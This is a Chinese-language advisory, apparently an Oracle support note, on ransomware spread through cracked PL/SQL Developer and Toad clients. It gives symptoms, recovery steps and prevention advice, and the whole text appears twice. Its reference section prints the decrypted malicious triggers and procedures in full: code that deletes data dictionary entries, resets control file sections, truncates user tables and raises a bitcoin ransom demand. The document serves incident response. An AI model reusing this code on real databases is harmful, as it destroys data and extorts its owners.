对数据库的“比特币攻击”及防护
ALERT: 数据库存在遭受比特币攻击的风险
________________________________________
In this Document
________________________________________
APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.
DESCRIPTION
用户使用客户端连接数据库或者数据库Alert日志中出现ORA-20312/ORA-20313/ORA-20315等报错信息,描述数据库已被锁死,需要发送比特币到某个地址来解锁数据库。
OCCURRENCE
客户使用被恶意篡改的绿色版或破解版的客户端软件(如破解的PL/SQL Developer或者Toad等软件)去连接数据库,在此类软件中,在连接成功后,调用注入的SQL脚本(Login.sql、AfterConnect.sql、toad.ini等)执行恶意代码,在数据库中生成三个触发器和四个存储过程。
当数据库重启或者用户连接数据库时,触发器会调用相应的存储过程操作数据库。这些存储过程会可能会破坏数据库,并抛出错误信息和提示信息。
SYMPTONS
用户使用客户端连接数据库或者数据库Alert日志中出现ORA-20312/ORA-20313/ORA-20315等报错信息,描述数据库已被锁死,需要发送比特币到某个地址来解锁数据库。这些注入脚本伪装成Oracle内部程序:
--
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- All rights reserved.
--
-- NAME
-- login.sql
--
-- DESCRIPTION
-- PL/SQL global login "site profile" file
--
-- Add any PL/SQL commands here that are to be executed when a
-- user starts PL/SQL, or uses the PL/SQL CONNECT command.
--
-- USAGE
-- This script is automatically run
--
-- This SQL was created by Oracle ; You should never remove/delete it!
-- MODIFIED (MM/DD/YY)
-- ……
两个已知的报错信息如下:
例子 1:
Alert.log 信息:
Thu Apr 13 13:48:55 2017
Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
ORA-00604: 递归 SQL 级别 1 出现错误
ORA-20315: 你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25
ORA-06512: 在 line 2
例子 2 使用客户端连接数据库时报错:
数据库中存在被加密的存储过程,名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
三个触发器名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
WORKAROUND
None
SOLUTION
针对现在已经发现的比特币攻击问题的处理方法如下:
1. 删除被恶意篡改的客户端软件
2. 根据不同的情况进行处理:
情况一:
SYSDATE-MIN(LAST_ANALYZED) 小于1200天
数据库损坏情况:未损坏
处理办法:
a.删除三个触发器:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
b.删除四个存储过错:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
情况二:
SYSDATE-MIN(LAST_ANALYZED) 大于1200天,并且SYSDATE-CREATED大于1200天但未重启 或者 SYSDATE-CREATED 小于1200天
数据库损坏情况:某些表被truncate
处理方法:
a.删除三个触发器和四个存储过程
b.使用备份把表恢复到truncate之前
c.使用DUL恢复(不一定能恢复所有的表,如truncate的空间已被使用)
情况三:
SYSDATE-CREATED 大于1200天
数据库损坏情况:某些表被truncate以及tab$被删除
处理方法:
a.删除三个触发器和四个存储过程
b.使用备份把表恢复到truncate之前
c.使用ORACHK开头的表恢复tab$
d.使用DUL恢复(不一定能恢复所有的表,如truncate的空间已被使用)
针对比特币攻击的预防措施:
1. 监控数据库中是否有相应的触发器和存储过程。及时删除相应触发器和存储过程。
2. 限制DBA权限的使用。
3. 检查相关登录工具的自动化脚本,清理有风险的脚本:
SQL*PLUS 中的glogin.sql/login.sql
Toad 中的toad.ini
PL/SQL Developer中的ogin.sql/AfterConnect.sql
4. 建议从官网下载工具,不要使用绿色版/破解版等。
REFERENCES
三个触发器的代码:
PROMPT Create "DBMS_SUPPORT_INTERNAL "
create or replace trigger "DBMS_SUPPORT_INTERNAL "
after startup on database
begin
"DBMS_SUPPORT_INTERNAL ";
end;
/
CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
AFTER LOGON ON DATABASE
BEGIN
"DBMS_SYSTEM_INTERNAL ";
END;
/
CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
AFTER LOGON ON SCHEMA
BEGIN
"DBMS_CORE_INTERNAL ";
END;
/
四个加密的存储过程的代码解密后如下:
PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库');
END LOOP;
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20312,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20313,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_CORE_INTERNAL " IS
V_JOB NUMBER;
DATE1 INT :=10;
STAT VARCHAR2(2000);
V_MODULE VARCHAR2(2000);
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20315);
CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
FOR I IN TLIST LOOP
DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
COMMIT;
END LOOP;
END IF;
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
END;
/
PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE V_DDL;
END;
/
________________________________________
In this Document
Description
Occurrence
Symptoms
Workaround
Solution
References
________________________________________
APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.
DESCRIPTION
用户使用客户端连接数据库或者数据库Alert日志中出现ORA-20312/ORA-20313/ORA-20315等报错信息,描述数据库已被锁死,需要发送比特币到某个地址来解锁数据库。
OCCURRENCE
客户使用被恶意篡改的绿色版或破解版的客户端软件(如破解的PL/SQL Developer或者Toad等软件)去连接数据库,在此类软件中,在连接成功后,调用注入的SQL脚本(Login.sql、AfterConnect.sql、toad.ini等)执行恶意代码,在数据库中生成三个触发器和四个存储过程。
当数据库重启或者用户连接数据库时,触发器会调用相应的存储过程操作数据库。这些存储过程会可能会破坏数据库,并抛出错误信息和提示信息。
SYMPTONS
用户使用客户端连接数据库或者数据库Alert日志中出现ORA-20312/ORA-20313/ORA-20315等报错信息,描述数据库已被锁死,需要发送比特币到某个地址来解锁数据库。这些注入脚本伪装成Oracle内部程序:
--
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- All rights reserved.
--
-- NAME
-- login.sql
--
-- DESCRIPTION
-- PL/SQL global login "site profile" file
--
-- Add any PL/SQL commands here that are to be executed when a
-- user starts PL/SQL, or uses the PL/SQL CONNECT command.
--
-- USAGE
-- This script is automatically run
--
-- This SQL was created by Oracle ; You should never remove/delete it!
-- MODIFIED (MM/DD/YY)
-- ……
两个已知的报错信息如下:
例子 1:
Alert.log 信息:
Thu Apr 13 13:48:55 2017
Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
ORA-00604: 递归 SQL 级别 1 出现错误
ORA-20315: 你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25
ORA-06512: 在 line 2
例子 2 使用客户端连接数据库时报错:
数据库中存在被加密的存储过程,名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
三个触发器名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
WORKAROUND
None
SOLUTION
针对现在已经发现的比特币攻击问题的处理方法如下:
1. 删除被恶意篡改的客户端软件
2. 根据不同的情况进行处理:
情况一:
SYSDATE-MIN(LAST_ANALYZED) 小于1200天
数据库损坏情况:未损坏
处理办法:
a.删除三个触发器:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
b.删除四个存储过错:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
情况二:
SYSDATE-MIN(LAST_ANALYZED) 大于1200天,并且SYSDATE-CREATED大于1200天但未重启 或者 SYSDATE-CREATED 小于1200天
数据库损坏情况:某些表被truncate
处理方法:
a.删除三个触发器和四个存储过程
b.使用备份把表恢复到truncate之前
c.使用DUL恢复(不一定能恢复所有的表,如truncate的空间已被使用)
情况三:
SYSDATE-CREATED 大于1200天
数据库损坏情况:某些表被truncate以及tab$被删除
处理方法:
a.删除三个触发器和四个存储过程
b.使用备份把表恢复到truncate之前
c.使用ORACHK开头的表恢复tab$
d.使用DUL恢复(不一定能恢复所有的表,如truncate的空间已被使用)
针对比特币攻击的预防措施:
1. 监控数据库中是否有相应的触发器和存储过程。及时删除相应触发器和存储过程。
2. 限制DBA权限的使用。
3. 检查相关登录工具的自动化脚本,清理有风险的脚本:
SQL*PLUS 中的glogin.sql/login.sql
Toad 中的toad.ini
PL/SQL Developer中的ogin.sql/AfterConnect.sql
4. 建议从官网下载工具,不要使用绿色版/破解版等。
REFERENCES
三个触发器的代码:
PROMPT Create "DBMS_SUPPORT_INTERNAL "
create or replace trigger "DBMS_SUPPORT_INTERNAL "
after startup on database
begin
"DBMS_SUPPORT_INTERNAL ";
end;
/
CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
AFTER LOGON ON DATABASE
BEGIN
"DBMS_SYSTEM_INTERNAL ";
END;
/
CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
AFTER LOGON ON SCHEMA
BEGIN
"DBMS_CORE_INTERNAL ";
END;
/
四个加密的存储过程的代码解密后如下:
PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库');
END LOOP;
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20312,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20313,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_CORE_INTERNAL " IS
V_JOB NUMBER;
DATE1 INT :=10;
STAT VARCHAR2(2000);
V_MODULE VARCHAR2(2000);
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20315);
CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
FOR I IN TLIST LOOP
DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
COMMIT;
END LOOP;
END IF;
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
END;
/
PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE V_DDL;
END;
/